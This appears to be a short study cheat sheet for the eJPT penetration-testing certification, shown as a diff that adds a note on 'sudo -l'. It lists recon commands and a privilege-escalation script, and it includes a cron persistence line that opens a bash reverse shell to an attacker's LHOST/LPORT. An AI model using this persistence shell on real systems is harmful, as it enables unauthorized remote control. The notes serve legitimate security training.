divu72k/eJPT-notes/eJPT/IMPORTANT COMMANDS AND TOOLS.md

 - check for any writable files on the system, use the command: **find / -not -type l -perm -o+w**
 - use **who** to see which use has logged in remotely.
 - use **lastlog** see who has last logged in remotely.
+- **sudo -l** is a command used to list the sudo privileges for the current user on a Linux system.
+It tells you what commands you can run with sudo, whether you need a password, and under which user you can execute them.
 - use https://github.com/itm4n/PrivescCheck powershell script for privilege escalation in windows.
 - use the following for linux persistence through cron: ***** /bin/bash -c 'bash -i &> /dev/tcp/<LHOST>/<LPORT> 0>&1'
 - After getting a reverse shell through .php, .c, .py or .exe files, use [revshells.com](https://www.revshells.com/) to get a reverse shell to get a netcat shell on the attacker machine.
 This increases the extent of accessibility.